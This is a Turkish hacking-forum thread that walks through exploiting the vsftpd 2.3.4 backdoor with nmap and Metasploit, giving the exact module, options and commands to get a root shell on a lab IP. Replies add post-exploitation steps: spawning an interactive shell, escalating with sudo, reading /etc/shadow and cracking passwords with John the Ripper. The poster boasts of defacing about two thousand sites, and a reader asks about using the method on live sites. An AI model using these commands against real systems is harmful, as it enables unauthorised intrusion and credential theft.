Pentester Dersi Port 21 Ftp Hackleme

'Exploitler' forumunda ArslannBey tarafından 12 Temmuz 2017 tarihinde açılan konu

    Katılım:
    16 Ocak 2017
    Mesaj:
    1,215
    Alınan Beğeniler:
    2,170

    Özel Mesaj
    Bir önceki konumuz port 80 http hackleme idi.
    Şimdi ise Port 21 in açıklı versionu olan vsftpd 2.3.4 ü hackliycez.



    Saldıracağımız IP adresimiz : 192.168.222.131


    Saldırıyı Yaparken Kullanacağımız Materyaller :

    1 - Nmap

    2 - Metasploit



    PORT 21 VSFTPD

    -sS komutu ile Syn taraması yaparak tcp portlarını görüntüledim ve de -sV komutu ile remote servislerin versionlarını görüntüledim.


    Bizim Saldırı Yapacağımız Port Numarası 21 yani FTP portu


    [​IMG]


    Görüldüğü Üzere Sistemin 21.Portunda VSFTPD Versionunun 2.3.4 Sürümü Mevcut.


    Metasploiti Açalım


    Kod:
    service postgresql start
    Kod:
    service mysql start
    Kod:
    msfconsole

    Evet Açıklı Version vsftpd 2.3.4 idi

    Metasploiti Açtık Uygun Exploit Aramak İçin Şunu Yazalım.


    Kod:
    search vsftpd 2.3.4

    Ve Ardından Karşımıza Bir Exploit Geliyor Ona Şu Komutla Girelim.


    Kod:
    use exploit/unix/ftp/vsftpd_234_backdoor

    [​IMG]


    Evet Exploitimize giriş yaptık ardından show options yazarak bizden doldurmasını istediğimiz şeyleri görelim.

    [​IMG]


    Evet Görüyoruzki Oynama Yapacağımız şey RHOST ve PAYLOAD olacak.


    Kod:
    set RHOST 192.168.222.131

    Yazdım. Ve Remote Sistemin ip sini belirttim.Ardından

    Kod:
    set PAYLOAD cmd/unix/interact


    Payloadı Düzenledim.

    [​IMG]


    Ve Son Olarak Da Artık


    Kod:
    exploit


    komutunu giriyorum ve shell scriptdeyim..


    [​IMG]


    whoami komutunu yazdığımda root göstergesini aldım.

    uname -a yazarak sistemi öğrendim.

    ardından ls -la yazarak bulundugum dizindeki dosya yetkilerini ve dosyaları öğrendim....

    Önceki Konularım

    https://forum.ayyildiz.org/konu/pentester-dersi-port-80-http-hackleme.119603/

    https://forum.ayyildiz.org/konu/pentest-dersi-mysql-hackleme-metasploit.119473/







     
  1. sebuhi Atıldı

    Katılım:
    22 Şubat 2017
    Mesaj:
    4,470
    Alınan Beğeniler:
    4,233

    Özel Mesaj
    Ellerine sağlık üst devrem.Bir sorum olacak ben 1 yıldan beri windows 10 kulanıyorum kali linux kullanmadanda windowsda hack işleri yapabilirmiyim? orta düzey çalışıyorum.Saygılarla
     
    sMrXX ve ArslannBey bunu beğendi.
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,215
    Alınan Beğeniler:
    2,170

    Özel Mesaj
    Tabii ki yapabilirsin çok program var ki programsızda yapabilirsin.Windowsda binden fazla ikibine yakın site indexlediğimi bilirim
     
    sebuhi bunu beğendi.
  2. sMrXX ER

    Katılım:
    14 Ocak 2017
    Mesaj:
    1,928
    Alınan Beğeniler:
    1,634

    Özel Mesaj
    Bir mantık BackConnect'dir yani 443 portunu dinlemek ile aynı mantıkdır.
     
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,215
    Alınan Beğeniler:
    2,170

    Özel Mesaj
    bir bakıma evet ama sadece bazı yerlerde genel olarak birinin yaptıgı başlangıcı diğerinde yapamassın örnek metasploit-backconnect başlangıçları
     
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,215
    Alınan Beğeniler:
    2,170

    Özel Mesaj
    aklım netcat'e gitmiş pardon :D evet buda bir backconnect
     
    sMrXX bunu beğendi.
  3. sMrXX ER

    Katılım:
    14 Ocak 2017
    Mesaj:
    1,928
    Alınan Beğeniler:
    1,634

    Özel Mesaj
    Dedim yöntem aynı çünkü ama amaçlar farklı birinde root oluyorsun, diğerinde port'dan hackliyorsun
     
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,215
    Alınan Beğeniler:
    2,170

    Özel Mesaj
    yok ikiside aynı sv ye giriyosun direkman root olmanın imkanı yok direk root olmak ıcın local ağda bulunması lazım.fakat remote'da farklı
     
    sMrXX bunu beğendi.
  4. sMrXX ER

    Katılım:
    14 Ocak 2017
    Mesaj:
    1,928
    Alınan Beğeniler:
    1,634

    Özel Mesaj
    O yüzden BackConnect daha mantıklı devam etmeyelim senin konu gereksiz çıkacak .)
     
    ArslannBey bunu beğendi.
  5. thekont ER

    Katılım:
    7 Haziran 2017
    Mesaj:
    214
    Alınan Beğeniler:
    280

    Özel Mesaj
    canım komutanım elinize sağlık. o elleriniz dert görmesin.
     
    Erdem2 ve sMrXX bunu beğendi.
  6. sMrXX ER

    Katılım:
    14 Ocak 2017
    Mesaj:
    1,928
    Alınan Beğeniler:
    1,634

    Özel Mesaj
    Konuda komutan göremedim devrem ?
     
  7. thekont ER

    Katılım:
    7 Haziran 2017
    Mesaj:
    214
    Alınan Beğeniler:
    280

    Özel Mesaj
    kusura bakmayın yanlış yere yazdım :)
     
  8. thekont ER

    Katılım:
    7 Haziran 2017
    Mesaj:
    214
    Alınan Beğeniler:
    280

    Özel Mesaj
    devrem eline sağlık.
     
    ArslannBey bunu beğendi.
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,215
    Alınan Beğeniler:
    2,170

    Özel Mesaj
    sağolasın
     
    thekont bunu beğendi.
    Katılım:
    13 Temmuz 2017
    Mesaj:
    4
    Alınan Beğeniler:
    0

    Özel Mesaj
    Devrem ellerine sağlık.Devamında

    python -c 'import pty; pty.spawn("/bin/sh")'

    bu kodu yazarak etkileşimli shell alabilirsiniz.Aldıktan sonrada zaten sudo su yazarak root oluyorsunuz. Diğer kullanıcıların parolalarınıda john the ripper ile kırabilirsiniz.

    diger kullanıcıların parolalarını cat /etc/shadow da bulabilirsiniz.
     
    Katılım:
    3 Nisan 2017
    Mesaj:
    368
    Alınan Beğeniler:
    264

    Özel Mesaj
    Güzel konu eline sağlık
     
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,215
    Alınan Beğeniler:
    2,170

    Özel Mesaj
    Katılım:
    30 Ocak 2017
    Mesaj:
    1,286
    Alınan Beğeniler:
    4,011

    Özel Mesaj
     
    ArslannBey bunu beğendi.
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,215
    Alınan Beğeniler:
    2,170

    Özel Mesaj
    ERVAH-I-EZEL bunu beğendi.
    Katılım:
    5 Eylül 2017
    Mesaj:
    43
    Alınan Beğeniler:
    6

    Özel Mesaj
    Bu 21 port acik olan siteler icinde gecerlimi?